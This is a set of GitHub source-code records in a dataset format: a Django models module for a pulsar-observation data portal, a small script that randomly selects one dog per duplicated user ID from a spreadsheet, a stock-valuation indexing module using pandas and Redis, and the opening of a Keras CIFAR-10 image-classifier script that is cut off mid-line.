models.DateTimeField() # start time\n project = models.CharField(max_length=50)\n embargo_end_date = models.DateTimeField(null=True)\n proposal = models.CharField(max_length=40)\n ephemeris = JSONField(null=True)\n ephemeris_is_updated_at = models.DateTimeField(null=True)\n length = models.FloatField(null=True)\n beam = models.IntegerField()\n bw = models.DecimalField(max_digits=12, decimal_places=2)\n nchan = models.IntegerField()\n band = models.CharField(choices=BAND_CHOICES, max_length=7)\n nbin = models.IntegerField()\n nant = models.IntegerField(null=True)\n nant_eff = models.IntegerField(null=True)\n dm_fold = models.DecimalField(max_digits=12, decimal_places=4, null=True)\n dm_meerpipe = models.DecimalField(max_digits=12, decimal_places=4, null=True)\n rm_meerpipe = models.DecimalField(max_digits=12, decimal_places=4, null=True)\n sn_backend = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n sn_meerpipe = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n flux = models.DecimalField(max_digits=12, decimal_places=6, null=True)\n ra = models.CharField(max_length=16, null=True)\n dec = models.CharField(max_length=16, null=True)\n tsubint = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n schedule = models.CharField(max_length=16, null=True)\n phaseup = models.CharField(max_length=16, null=True)\n frequency = models.DecimalField(null=True, max_digits=15, decimal_places=9)\n npol = models.IntegerField(null=True)\n ephemeris_download_link = models.URLField(null=True)\n toas_download_link = models.URLField(null=True)\n\n class Meta:\n ordering = [\"-utc\"]\n\n @property\n def estimated_size(self):\n \"\"\"Estimated size of the observation data stored on disk in bytes.\"\"\"\n try:\n return math.ceil(self.length / float(self.tsubint)) * self.nbin * self.nchan * self.npol * 2\n except ZeroDivisionError:\n return 0\n\n @property\n def jname(self):\n return self.fold_pulsar.jname\n\n @property\n def session(self):\n return Sessions.get_session(self.utc)\n\n def get_band_centre_frequency(self):\n # Centre frequency is currnently used as part of the file structure\n # on OzStar as an int value. Most common is 1284.\n # We need to calculate this so we can get the correct path of files for download.\n band = BANDS.get(self.band)\n return int(band[\"centre_frequency\"]) if band else None\n\n def is_restricted(self, user):\n # If the user role isn't restricted they can access everything\n if user.role.upper() in [UserRole.UNRESTRICTED.value, UserRole.ADMIN.value]:\n return False\n\n # If there's no embargo then it's not restricted\n return self.embargo_end_date >= datetime.now(tz=pytz.UTC)\n\n @classmethod\n def get_sn_meerpipe(cls, folding, project_short):\n try:\n pipeline_name = f\"MeerPIPE_{project_short}\"\n return folding.processing.processings_set.get(pipeline__name=pipeline_name).results.get(\"snr\", None)\n except Processings.DoesNotExist:\n return None\n\n @classmethod\n def get_ephemeris_link(cls, pulsar):\n # ex: 'https://pulsars.org.au/media/MeerKAT/MeerPIPE_TPA/J1909-3744/2022-08-29-19:03:27/3/J1909-3744.par\n\n foldings = Foldings.objects.filter(folding_ephemeris__pulsar=pulsar)\n\n for folding in foldings:\n pipeline_files = Pipelinefiles.objects.filter(processing__parent=folding.processing)\n for pipleline_file in pipeline_files:\n if str(pipleline_file.file).endswith(f\"{pulsar.jname}.par\"):\n return str(pipleline_file.file)\n\n return \"\"\n\n @classmethod\n def get_toas_link(cls, pulsar):\n # ex: 'https://pulsars.org.au/media/MeerKAT/MeerPIPE_PTA/\n # J1843-1448/2022-08-29-18:20:32/3/pta.J1843-1448_global.tim.gz'\n\n foldings = Foldings.objects.filter(folding_ephemeris__pulsar=pulsar)\n\n for folding in foldings:\n pipeline_files = Pipelinefiles.objects.filter(processing__parent=folding.processing)\n for pipleline_file in pipeline_files:\n if str(pipleline_file.file).endswith(f\"{pulsar.jname}_global.tim.gz\"):\n return str(pipleline_file.file)\n\n return \"\"\n\n @classmethod\n def get_flux(cls, folding, project_short):\n \"\"\"Get the flux value for a folding observation.\"\"\"\n\n # If it's a molonglo observation we can just get the latest flux value.\n if project_short == \"MONSPSR_TIMING\":\n try:\n return folding.processing.results.get(\"flux\", None)\n except Processings.DoesNotExist:\n return None\n\n pipeline_name = f\"MeerPIPE_{project_short}\"\n try:\n # We want the flux value set to the real project if there is one.\n flux = folding.processing.processings_set.get(pipeline__name=pipeline_name).results.get(\"flux\", None)\n\n if flux is not None:\n return flux\n # The order to try projects as set by the science team.\n project_priority = [\"MeerPIPE_PTA\", \"MeerPIPE_TPA\", \"MeerPIPE_RelBin\"]\n\n # Remove the actual folding observation project because we try that first.\n project_priority_order = [project for project in project_priority if project is not pipeline_name]\n\n # It's better to have a value from another project than no value at all.\n for project in project_priority_order:\n flux = folding.processing.processings_set.get(pipeline__name=project).results.get(\"flux\", None)\n if flux is not None:\n return flux\n\n except Processings.DoesNotExist:\n return None\n\n @classmethod\n def bulk_update_or_create(cls, foldings):\n to_create = []\n fold_detail_images = {}\n\n fold_pulsars = FoldPulsar.objects.filter(\n Q(jname__in=[f.folding_ephemeris.pulsar.jname for f in foldings])\n | Q(main_project__in=[f.processing.observation.project.program.name for f in foldings])\n )\n\n for folding in foldings:\n pulsar = folding.folding_ephemeris.pulsar\n observation = folding.processing.observation\n main_project = observation.project.program.name\n\n def pulsar_check(filter_pulsar):\n return filter_pulsar.jname == pulsar.jname and filter_pulsar.main_project == main_project\n\n for fold_pulsar in filter(pulsar_check, fold_pulsars):\n # Calculate and set the embargo end date from observation and main project.\n # At this stage, we use the observation utc_start and main_project's\n # embargo_period to do the calculation,\n # later we will apply the processing.embargo_end as well.\n embargo_end_date = observation.utc_start + observation.project.embargo_period\n\n results = folding.processing.results or {}\n project_short = observation.project.short\n\n sn_meerpipe = cls.get_sn_meerpipe(folding, project_short)\n flux = cls.get_flux(folding, project_short)\n\n to_create.append(\n FoldPulsarDetail(\n fold_pulsar=fold_pulsar,\n utc=observation.utc_start,\n project=observation.project.short,\n embargo_end_date=embargo_end_date,\n proposal=observation.project.code,\n ephemeris=folding.folding_ephemeris.ephemeris,\n ephemeris_is_updated_at=folding.folding_ephemeris.created_at,\n length=observation.duration,\n beam=observation.instrument_config.beam,\n bw=observation.instrument_config.bandwidth,\n ra=observation.target.raj,\n dec=observation.target.decj,\n nchan=folding.nchan,\n tsubint=folding.tsubint,\n band=fold_pulsar.get_band(observation.instrument_config.frequency),\n nbin=folding.nbin,\n nant=observation.nant,\n nant_eff=observation.nant_eff,\n dm_fold=folding.dm,\n dm_meerpipe=folding.folding_ephemeris.dm,\n rm_meerpipe=folding.folding_ephemeris.rm,\n sn_backend=results.get(\"snr\", None),\n flux=flux,\n sn_meerpipe=sn_meerpipe,\n schedule=\"12\",\n phaseup=\"12\",\n frequency=observation.instrument_config.frequency,\n npol=folding.npol,\n ephemeris_download_link=cls.get_ephemeris_link(pulsar=pulsar),\n toas_download_link=cls.get_toas_link(pulsar=pulsar),\n )\n )\n\n fold_detail_images[len(to_create) - 1] = []\n # Find all TOA entries with a matching fold_id. These TOA entries should each link back to an entry in\n # processings, with only one processing per pipeline (i.e. project code). Those processing entries than\n # link forwards to the pipelineimages table.\n for toas in folding.toas_set.all():\n for image in toas.processing.pipelineimages_set.all():\n fold_detail_images[len(to_create) - 1].append(\n FoldDetailImage(image_type=image.image_type, url=image.image.name)\n )\n # Also process the raw images\n for image in folding.processing.pipelineimages_set.all():\n fold_detail_images[len(to_create) - 1].append(\n FoldDetailImage(image_type=image.image_type, url=image.image.name)\n )\n\n FoldPulsarDetail.objects.all().delete()\n FoldPulsarDetail.objects.bulk_create(to_create)\n\n fold_pulsar_detail_objects = FoldPulsarDetail.objects.all().order_by(\"id\")\n images_something_else = []\n\n for index, images in fold_detail_images.items():\n for image in images:\n image.fold_pulsar_detail = fold_pulsar_detail_objects[index]\n\n images_something_else.extend(images)\n\n FoldDetailImage.objects.bulk_create(images_something_else)\n\n @classmethod\n def update_or_create(cls, folding):\n pulsar = folding.folding_ephemeris.pulsar\n observation = folding.processing.observation\n main_project = observation.project.program.name\n\n try:\n fold_pulsar = FoldPulsar.objects.get(jname=pulsar.jname, main_project=main_project)\n except FoldPulsar.DoesNotExist:\n print(\"FoldPulsar \", pulsar.jname, main_project, \" does not exist\")\n return\n except AttributeError:\n # If an observation doesn't have a project or program we want to skip it.\n # Hopefully this never happens.\n return\n\n # Calculate and set the embargo end date from observation and main project.\n # At this stage, we use the observation utc_start and main_project's embargo_period to do the calculation,\n # later we will apply the processing.embargo_end as well.\n embargo_end_date = observation.utc_start + observation.project.embargo_period\n\n results = folding.processing.results or {}\n project_short = observation.project.short\n\n sn_meerpipe = cls.get_sn_meerpipe(folding, project_short)\n flux = cls.get_flux(folding, project_short)\n\n new_fold_pulsar_detail, created = FoldPulsarDetail.objects.update_or_create(\n fold_pulsar=fold_pulsar,\n utc=observation.utc_start,\n defaults={\n \"project\": observation.project.short,\n \"embargo_end_date\": embargo_end_date,\n \"proposal\": observation.project.code,\n \"ephemeris\": folding.folding_ephemeris.ephemeris,\n \"ephemeris_is_updated_at\": folding.folding_ephemeris.created_at,\n \"length\": observation.duration,\n \"beam\": observation.instrument_config.beam,\n \"bw\": observation.instrument_config.bandwidth,\n \"ra\": observation.target.raj,\n \"dec\": observation.target.decj,\n \"nchan\": folding.nchan,\n \"tsubint\": folding.tsubint,\n \"band\": fold_pulsar.get_band(observation.instrument_config.frequency),\n \"nbin\": folding.nbin,\n \"nant\": observation.nant,\n \"nant_eff\": observation.nant_eff,\n \"dm_fold\": folding.dm,\n \"dm_meerpipe\": folding.folding_ephemeris.dm,\n \"rm_meerpipe\": folding.folding_ephemeris.rm,\n \"sn_backend\": results.get(\"snr\", None),\n \"flux\": flux,\n \"sn_meerpipe\": sn_meerpipe,\n \"schedule\": \"12\",\n \"phaseup\": \"12\",\n \"frequency\": observation.instrument_config.frequency,\n \"npol\": folding.npol,\n \"ephemeris_download_link\": cls.get_ephemeris_link(pulsar=pulsar),\n \"toas_download_link\": cls.get_toas_link(pulsar=pulsar),\n },\n )\n\n # Find all TOA entries with a matching fold_id. These TOA entries should each link back to an entry in\n # processings, with only one processing per pipeline (i.e. project code). Those processing entries than link\n # forwards to the pipelineimages table.\n for toas in folding.toas_set.all():\n for image in toas.processing.pipelineimages_set.all():\n FoldDetailImage.objects.update_or_create(\n fold_pulsar_detail=new_fold_pulsar_detail,\n image_type=image.image_type,\n defaults={\"url\": image.image.name},\n )\n # Also process the raw images\n for image in folding.processing.pipelineimages_set.all():\n FoldDetailImage.objects.update_or_create(\n fold_pulsar_detail=new_fold_pulsar_detail,\n image_type=image.image_type,\n defaults={\"url\": image.image.name},\n )\n\n return new_fold_pulsar_detail, created\n\n @classmethod\n def format_utc(cls, utc):\n return datetime.strptime(utc, \"%Y-%m-%d-%H:%M:%S\")\n\n @classmethod\n def get_query(cls, **kwargs):\n if \"jname\" in kwargs:\n kwargs[\"fold_pulsar__jname\"] = kwargs.pop(\"jname\")\n\n if \"main_project\" in kwargs:\n kwargs[\"fold_pulsar__main_project\"] = kwargs.pop(\"main_project\")\n\n if \"utc\" in kwargs:\n kwargs[\"utc\"] = cls.format_utc(kwargs[\"utc\"])\n\n return cls.objects.filter(**kwargs)\n\n\nclass SearchmodePulsarDetail(models.Model):\n searchmode_pulsar = models.ForeignKey(SearchmodePulsar, on_delete=models.CASCADE)\n utc = models.DateTimeField()\n embargo_end_date = models.DateTimeField(null=True)\n project = models.CharField(max_length=50)\n ra = models.CharField(max_length=16)\n dec = models.CharField(max_length=16)\n length = models.FloatField(null=True)\n beam = models.IntegerField()\n frequency = models.DecimalField(max_digits=50, decimal_places=8)\n nchan = models.IntegerField()\n nbit = models.IntegerField()\n nant_eff = models.IntegerField(null=True)\n npol = models.IntegerField()\n dm = models.DecimalField(max_digits=12, decimal_places=4)\n tsamp = models.DecimalField(max_digits=12, decimal_places=2)\n\n class Meta:\n ordering = [\"-utc\"]\n\n @classmethod\n def update_or_create(cls, filter_bankings):\n observation = filter_bankings.processing.observation\n searchmode_pulsar = SearchmodePulsar.objects.get(jname=observation.target.name)\n\n # calculate and set the embargo end date from observation and main project(observation.project??).\n # at this stage, we use the observation utc_start and main_project's embargo_period to do the calculation\n # later we will apply the processing.embargo_end as well\n embargo_end_date = observation.utc_start + observation.project.embargo_period\n\n return cls.objects.update_or_create(\n searchmode_pulsar=searchmode_pulsar,\n utc=filter_bankings.processing.observation.utc_start,\n defaults={\n \"project\": observation.project.short,\n \"embargo_end_date\": embargo_end_date,\n \"ra\": observation.target.raj,\n \"dec\": observation.target.decj,\n \"length\": observation.duration,\n \"beam\": observation.instrument_config.beam,\n \"frequency\": observation.instrument_config.frequency,\n \"nchan\": filter_bankings.nchan,\n \"nbit\": filter_bankings.nbit,\n \"nant_eff\": observation.nant_eff,\n \"npol\": filter_bankings.npol,\n \"dm\": filter_bankings.dm,\n \"tsamp\": filter_bankings.tsamp,\n },\n )\n\n @classmethod\n def get_query(cls, **kwargs):\n if \"jname\" in kwargs:\n kwargs[\"searchmode_pulsar__jname\"] = kwargs.pop(\"jname\")\n\n if \"project\" in kwargs:\n kwargs[\"searchmode_pulsar__main_project\"] = kwargs.pop(\"project\")\n\n return cls.objects.filter(**kwargs)\n\n\nclass SessionDisplay(models.Model):\n start = models.DateTimeField()\n end = models.DateTimeField()\n number_of_observations = models.IntegerField()\n number_of_pulsars = models.IntegerField()\n list_of_pulsars = models.TextField(null=True)\n frequency = models.FloatField(null=True)\n projects = models.CharField(max_length=2000, null=True)\n total_integration = models.IntegerField()\n n_dish_min = models.IntegerField(null=True)\n n_dish_max = models.IntegerField(null=True)\n zap_fraction = models.FloatField(null=True)\n\n class Meta:\n ordering = [\"-start\"]\n\n @classmethod\n def update_or_create(cls, session):\n session_pulsars = SessionPulsar.objects.filter(\n session_display__start=session.start, session_display__end=session.end\n )\n\n number_of_observations = 0\n\n n_dish_max = None\n n_dish_min = None\n\n for session_pulsar in session_pulsars.all():\n if session_pulsar.fold_pulsar:\n number_of_observations += session_pulsar.fold_pulsar.foldpulsardetail_set.filter(\n utc__range=(session.start, session.end)\n ).count()\n min_nant_eff, max_nant_eff = (\n session_pulsar.fold_pulsar.foldpulsardetail_set.filter(utc__range=(session.start, session.end))\n .aggregate(models.Min(\"nant_eff\"), models.Max(\"nant_eff\"))\n .values()\n )\n\n if n_dish_min:\n n_dish_min = min_nant_eff if n_dish_min > min_nant_eff else n_dish_min\n else:\n n_dish_min = min_nant_eff\n\n if n_dish_max:\n n_dish_max = max_nant_eff if n_dish_max < max_nant_eff else n_dish_max\n else:\n n_dish_max = max_nant_eff\n\n if session_pulsar.search_pulsar:\n number_of_observations += session_pulsar.search_pulsar.searchmodepulsardetail_set.filter(\n utc__range=(session.start, session.end)\n ).count()\n min_nant_eff, max_nant_eff = (\n session_pulsar.search_pulsar.searchmodepulsardetail_set.filter(\n utc__range=(session.start, session.end)\n )\n .aggregate(models.Min(\"nant_eff\"), models.Max(\"nant_eff\"))\n .values()\n )\n\n if n_dish_min:\n n_dish_min = min_nant_eff if n_dish_min > min_nant_eff else n_dish_min\n else:\n n_dish_min = min_nant_eff\n\n if n_dish_max:\n n_dish_max = max_nant_eff if n_dish_max < max_nant_eff else n_dish_max\n else:\n n_dish_max = max_nant_eff\n\n projects = \", \".join({session_pulsar.project for session_pulsar in session_pulsars})\n\n list_of_pulsars = \", \".join(\n set.union(\n {session_pulsar.fold_pulsar.jname for session_pulsar in session_pulsars if session_pulsar.fold_pulsar},\n {\n session_pulsar.search_pulsar.jname\n for session_pulsar in session_pulsars\n if session_pulsar.search_pulsar\n },\n )\n )\n\n total_integration = sum(session.integrations for session in session_pulsars)\n\n # Because we only create a new session per start time we need to work out if we need to keep the old end or use\n # the new one based on which is later. This is fixes an issue with the way Sessions are created in the ingest.\n try:\n current_end = cls.objects.get(start=session.start).end\n end = current_end if current_end > session.end else session.end\n except cls.DoesNotExist:\n end = session.end\n\n return cls.objects.update_or_create(\n start=session.start,\n defaults={\n \"end\": end,\n \"number_of_observations\": number_of_observations,\n \"frequency\": getattr(\n session_pulsars.filter(frequency__isnull=False).first(),\n \"frequency\",\n None,\n ),\n \"number_of_pulsars\": session_pulsars.count(),\n \"list_of_pulsars\": list_of_pulsars,\n \"projects\": projects,\n \"total_integration\": total_integration,\n \"n_dish_min\": n_dish_min,\n \"n_dish_max\": n_dish_max,\n \"zap_fraction\": 0,\n },\n )\n\n @classmethod\n def get_query(cls, **kwargs):\n return cls.objects.filter(number_of_observations__gt=0, **kwargs)\n\n @classmethod\n def get_last_session(cls):\n return cls.objects.first()\n\n @classmethod\n def get_query_instance(cls, **kwargs):\n if \"project\" in kwargs and kwargs[\"project\"] == \"All\":\n kwargs.pop(\"project\")\n\n if \"start\" in kwargs and \"end\" in kwargs:\n kwargs[\"start\"] = parser.parse(kwargs.get(\"start\", \"\"))\n kwargs[\"end\"] = parser.parse(kwargs.get(\"end\", \"\"))\n return cls.objects.get(**kwargs)\n\n elif \"utc\" in kwargs:\n utc = parser.parse(kwargs.pop(\"utc\"))\n return cls.objects.get(start__lte=utc, end__gte=utc)\n\n else:\n return cls.get_last_session()\n\n def get_session_pulsars(self, **kwargs):\n if \"project\" in kwargs and kwargs[\"project\"] == \"All\":\n kwargs.pop(\"project\")\n\n return self.sessionpulsar_set.filter(**kwargs)\n\n\nclass SessionPulsar(models.Model):\n session_display = models.ForeignKey(SessionDisplay, on_delete=models.CASCADE)\n fold_pulsar = models.ForeignKey(FoldPulsar, null=True, on_delete=models.CASCADE)\n search_pulsar = models.ForeignKey(SearchmodePulsar, null=True, on_delete=models.CASCADE)\n utc = models.DateTimeField()\n project = models.CharField(max_length=50)\n backendSN = models.IntegerField(null=True)\n integrations = models.IntegerField()\n beam = models.IntegerField()\n frequency = models.DecimalField(max_digits=50, decimal_places=8)\n flux_hi = models.URLField(null=True)\n flux_lo = models.URLField(null=True)\n phase_vs_frequency_hi = models.URLField(null=True)\n phase_vs_frequency_lo = models.URLField(null=True)\n phase_vs_time_hi = models.URLField(null=True)\n phase_vs_time_lo = models.URLField(null=True)\n\n class Meta:\n ordering = [\"-session_display__start\"]\n\n @property\n def jname(self):\n return self.fold_pulsar.jname\n\n @property\n def pulsar_type(self):\n return \"search\" if self.search_pulsar else \"fold\"\n\n @classmethod\n def get_session_image(cls, images, plot_type, resolution=\"hi\"):\n # Make sure there are images to process.\n if images is None:\n return None\n\n # Try and find a cleaned image favouring this order: relbin, tpa, pta.\n # Skip if it's a bad plot type by setting [] as the default.\n for name in PLOT_NAMES.get(plot_type, []):\n if images.filter(image_type=f\"relbin.{name}.{resolution}\").exists():\n return images.get(image_type=f\"relbin.{name}.{resolution}\").url\n\n if images.filter(image_type=f\"tpa.{name}.{resolution}\").exists():\n return images.get(image_type=f\"tpa.{name}.{resolution}\").url\n\n if images.filter(image_type=f\"pta.{name}.{resolution}\").exists():\n return images.get(image_type=f\"pta.{name}.{resolution}\").url\n\n # If there's no cleaned image try and get a raw image.\n try:\n return images.get(image_type=f\"{plot_type}.{resolution}\").url\n except FoldDetailImage.DoesNotExist:\n return None\n\n @classmethod\n def update_or_create(cls, session, pulsar):\n if isinstance(pulsar, SearchmodePulsar):\n last_observation = pulsar.searchmodepulsardetail_set.filter(utc__range=(session.start, session.end)).last()\n images = None\n fold_pulsar = None\n search_pulsar = pulsar\n elif isinstance(pulsar, FoldPulsar):\n last_observation = pulsar.foldpulsardetail_set.filter(utc__range=(session.start, session.end)).last()\n images = last_observation.images.all()\n fold_pulsar = pulsar\n search_pulsar = None\n else:\n return False, None\n\n return cls.objects.update_or_create(\n session_display=session,\n fold_pulsar=fold_pulsar,\n search_pulsar=search_pulsar,\n defaults={\n \"utc\": last_observation.utc,\n \"project\": last_observation.project,\n \"backendSN\": getattr(last_observation, \"sn_backend\", None),\n \"integrations\": last_observation.length,\n \"beam\": last_observation.beam,\n \"frequency\": last_observation.frequency,\n \"flux_hi\": cls.get_session_image(images, \"flux\"),\n \"flux_lo\": cls.get_session_image(images, \"flux\"),\n \"phase_vs_frequency_hi\": cls.get_session_image(images, \"freq\"),\n \"phase_vs_frequency_lo\": cls.get_session_image(images, \"freq\"),\n \"phase_vs_time_hi\": cls.get_session_image(images, \"time\"),\n \"phase_vs_time_lo\": cls.get_session_image(images, \"time\"),\n },\n )\n","repo_name":"gravitationalwavedc/meertime_dataportal","sub_path":"backend/web_cache/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":40016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"39728658896","text":"'''\r\nFuture impovements:\r\nIterate through tabs, starting at most recect tab and working backwards so as not to include dogs removed from study\r\n'''\r\n\r\n\r\n\r\n#import libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom datetime import datetime\r\nimport PySimpleGUI as sg\r\nimport os\r\nimport sys\r\n\r\ndef Repeat(x):\r\n _size = len(x) #Get size of list\r\n repeated = [] #Initiate list for duplicate values\r\n for i in range(_size): #Iterate over array the size of the user id\r\n k = i + 1 #range + 1\r\n for j in range(k, _size):\r\n if x[i] == x[j] and x[i] not in repeated:\r\n repeated.append(x[i])\r\n return repeated\r\n\r\n#Create GUI to input file path\r\nsg.theme('DarkAmber')\r\n# All the stuff inside window.\r\nlayout = [[sg.Text('Select File:')],\r\n [sg.In(),sg.FileBrowse()],\r\n [sg.Text('Select Output Folder:')],\r\n [sg.In(),sg.FolderBrowse()],\r\n [sg.Text('Name File:')],\r\n [sg.In()],\r\n [sg.Button('Ok'), sg.Button('Cancel')]]\r\n\r\n# Create the Window\r\nwindow = sg.Window('Window Title', layout)\r\n# Event Loop to process \"events\" and get the \"values\" of the inputs\r\nwhile True:\r\n event, values = window.read()\r\n if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel\r\n window.close()\r\n sys.exit()\r\n break\r\n if event == 'Ok': #if user clicks okay\r\n file_path = values.get(0)\r\n output_path = values.get(1)\r\n file_name = values.get(2)\r\n window.close()\r\n break\r\n\r\n#Drives and File Paths\r\n#Drive = 'C:\\\\'\r\n#Output = os.path.join(Drive, 'Python', 'RandomDogSelection', 'Output')\r\n\r\n#Get current datetime\r\nnow = datetime.now()\r\ndt_string = now.strftime(\"%Y%m%d%H%S\")\r\n\r\n#Import extract\r\ndf = pd.read_excel(file_path)\r\n\r\n#Create copy of extract\r\ndf_1 = df\r\n\r\n#Get List of userid's\r\nuser_ids = df['User ID'].tolist()\r\n\r\n#Get repeated id's in user_ids\r\ndupes = Repeat(user_ids)\r\n\r\n#Remove all dupes from orginal df\r\nfor dupe in dupes:\r\n df = df[df['User ID'] != dupe]\r\n\r\n#For each duplicate userid in df_1 (copy), randomly select one dog and append to df containing non-duplicate ids in\r\n#filtered df\r\nfor dupe in dupes:\r\n filt_1 = df_1[df_1['User ID'] == dupe]\r\n length = len(filt_1)\r\n rand = np.random.randint(0, length)\r\n filt_2 = filt_1.iloc[[rand]]\r\n df = pd.concat([df, filt_2])\r\n\r\n#Input file name - maybe change to a GUI in futute?\r\n#file_name = input('Please Name Your File: ')\r\n#Output to excel\r\n#df.to_excel(output_path + '\\{}_{}.xlsx'.format(file_name, dt_string), index=False)\r\n\r\nprint(\"Random Selection Complete\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"arwDT/Random-Dog-Selection","sub_path":"RandomDogSelect.py","file_name":"RandomDogSelect.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3655971406","text":"import json\n\nimport numpy as np\nimport pandas as pd\n\nfrom historical_data.cache.redis_wrapper import RedisWrapper, make_md5_id\n\n\nSTAT_METHODS = [\"mean\", \"median\", \"min\", \"max\"]\n\n\ndef create_df_file_from_fundamentals_index(fundamentals_index_file, output_path):\n with open(fundamentals_index_file) as f:\n content = json.loads(f.read())\n json_lines = []\n for line in content:\n general = line[\"General\"]\n highlights = line[\"Highlights\"]\n valuation = line[\"Valuation\"]\n\n pe_ratio = highlights[\"PERatio\"] if highlights[\"PERatio\"] is not None else 0\n peg_ratio = highlights[\"PEGRatio\"] if highlights[\"PEGRatio\"] is not None else 0\n book = highlights[\"BookValue\"] if highlights[\"BookValue\"] is not None else 0\n eps = highlights[\"EarningsShare\"] if highlights[\"EarningsShare\"] is not None else 0\n pm = highlights[\"ProfitMargin\"] if highlights[\"ProfitMargin\"] is not None else 0\n op = highlights[\"OperatingMarginTTM\"] if highlights[\"OperatingMarginTTM\"] is not None else 0\n rps = highlights[\"RevenuePerShareTTM\"] if highlights[\"RevenuePerShareTTM\"] is not None else 0\n qrg = highlights[\"QuarterlyRevenueGrowthYOY\"] if highlights[\"QuarterlyRevenueGrowthYOY\"] is not None else 0\n ps_ratio = valuation[\"PriceSalesTTM\"] if valuation[\"PriceSalesTTM\"] is not None else 0\n pb_ratio = valuation[\"PriceBookMRQ\"] if valuation[\"PriceBookMRQ\"] is not None else 0\n\n d = {\n \"sector\": general[\"Sector\"],\n \"industry\": general[\"Industry\"],\n \"code\": general[\"Code\"],\n \"peRatio\": pe_ratio,\n \"pegRatio\": peg_ratio,\n \"bookValue\": book,\n \"eps\": eps,\n \"profitMargin\": pm,\n \"operatingMargin\": op,\n \"revenuePerShare\": rps,\n \"quarterlyRevenueGrowth\": qrg,\n \"psRatio\": ps_ratio,\n \"pbRatio\": pb_ratio\n }\n json_lines.append(d)\n\n index_output_file = output_path + \"df_index.json\"\n with open(index_output_file, \"w\") as output_file:\n output_file.write(json.dumps(json_lines))\n return index_output_file\n\n\ndef make_industry_grouped_valuation_index(df_index_file, output_path):\n d = {}\n df = pd.read_json(df_index_file)\n\n dfg = df.groupby([\"industry\"])\n for col in df.keys():\n if col in [\"code\", \"sector\", \"industry\"]:\n continue\n\n for stat_method in STAT_METHODS:\n method = getattr(dfg[col], stat_method)\n series = method()\n for group_key in series.keys():\n if group_key not in d:\n d[group_key] = {}\n\n prop = f\"{col}{stat_method.capitalize()}\"\n if prop not in d:\n d[group_key][prop] = float(series[group_key])\n lines = []\n r = RedisWrapper()\n for industry in d.keys():\n rec = {\n \"id\": industry,\n \"industry\": industry,\n \"hid\": make_md5_id(industry),\n **d[industry]\n }\n lines.append(rec)\n r.add_dict_to_hset(\"IndustryGroupedKeyHighlightsIndex\", industry, rec)\n\n file = output_path + \"industry_grouped_key_valuations_highlights_index.json\"\n with open(file, \"w\") as output_file:\n output_file.write(json.dumps(lines))\n return file\n\n\ndef make_industry_ranked_valuation_index(df_index_file, output_path):\n df = pd.read_json(df_index_file)\n df = df.replace(0, np.NaN)\n\n dfg = df.groupby([\"industry\"])\n for col in df.keys():\n if col in [\"code\", \"sector\", \"industry\"]:\n continue\n\n df_ranked = dfg[col].rank(\"average\")\n df[f\"{col}Rank\"] = df_ranked\n\n r = RedisWrapper()\n for index, row in df.iterrows():\n for key in row.keys():\n val = row[key]\n if type(val) != str:\n if np.isnan(val):\n val = 0\n r.add_one_to_hset(\"StockOverviewKeyHighlightsIndexWithRanks\", row[\"code\"], key, val)\n\n output_file = output_path + \"df_industry_ranked_key_highlights_index.json\"\n df.to_json(path_or_buf=output_file, orient=\"records\")\n return output_file\n","repo_name":"pavelbogomolenko/stock-analyzer-tools","sub_path":"stock_data_analysis/historical_data/stats/eod/highlights_and_valuation_index.py","file_name":"highlights_and_valuation_index.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7375732905","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten, Dropout\r\nfrom keras.layers import Dense\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.utils import to_categorical\r\nfrom keras.layers.convolutional import Conv2D\r\n\r\n\r\ndef wypakuj_plik(file):\r\n import pickle\r\n fo=open(file,'rb')\r\n dict=pickle.load(fo,encoding='latin1')\r\n fo.close()\r\n return dict\r\n\r\n\r\ndef przygotuj_dane_przykladow_treningowych():\r\n batch1_data = Batch1['data']\r\n batch2_data = Batch2['data']\r\n batch3_data = Batch3['data']\r\n batch4_data = Batch4['data']\r\n batch5_data = Batch5['data']\r\n dane_przyklady = np.concatenate((batch1_data,\r\n batch2_data,\r\n batch3_data,\r\n batch4_data,\r\n batch5_data))\r\n \r\n dane_przyklady = dane_przyklady.reshape([-1,3,32,32]).transpose([0,2,3,1]) \r\n dane_przyklady = dane_przyklady[0:Liczba_przykladow_treningowych,:,:,:]\r\n return dane_przyklady\r\n\r\n\r\ndef przygotuj_dane_kategorie_przykladow_treningowych():\r\n batch1_labels=Batch1['labels']\r\n batch2_labels=Batch2['labels']\r\n batch3_labels=Batch3['labels']\r\n batch4_labels=Batch4['labels']\r\n batch5_labels=Batch5['labels']\r\n dane_przyklady_kategorie = np.concatenate((batch1_labels,\r\n batch2_labels,\r\n batch3_labels,\r\n batch4_labels,\r\n batch5_labels))\r\n dane_przyklady_kategorie = dane_przyklady_kategorie[0:Liczba_przykladow_treningowych]\r\n \r\n return dane_przyklady_kategorie\r\n\r\n\r\ndef przygotuj_dane_przykladow_testowych():\r\n dane_przyklady_testowe = Batch_test['data'] \r\n dane_przyklady_testowe = dane_przyklady_testowe.reshape([-1,3,32,32]).transpose([0,2,3,1])\r\n \r\n dane_przyklady_testowe = dane_przyklady_testowe[0:Liczba_przykladow_testowych,:,:,:]\r\n \r\n return dane_przyklady_testowe\r\n \r\n \r\ndef przygotuj_dane_kategorii_przykladow_testowych():\r\n y_test = np.asarray(Batch_test['labels'])\r\n return y_test[0:Liczba_przykladow_testowych]\r\n\r\n\r\ndef dodaj_warstwy_do_sieci_wariant1():\r\n model_sieci = Sequential()\r\n model_sieci.add(Conv2D(64, 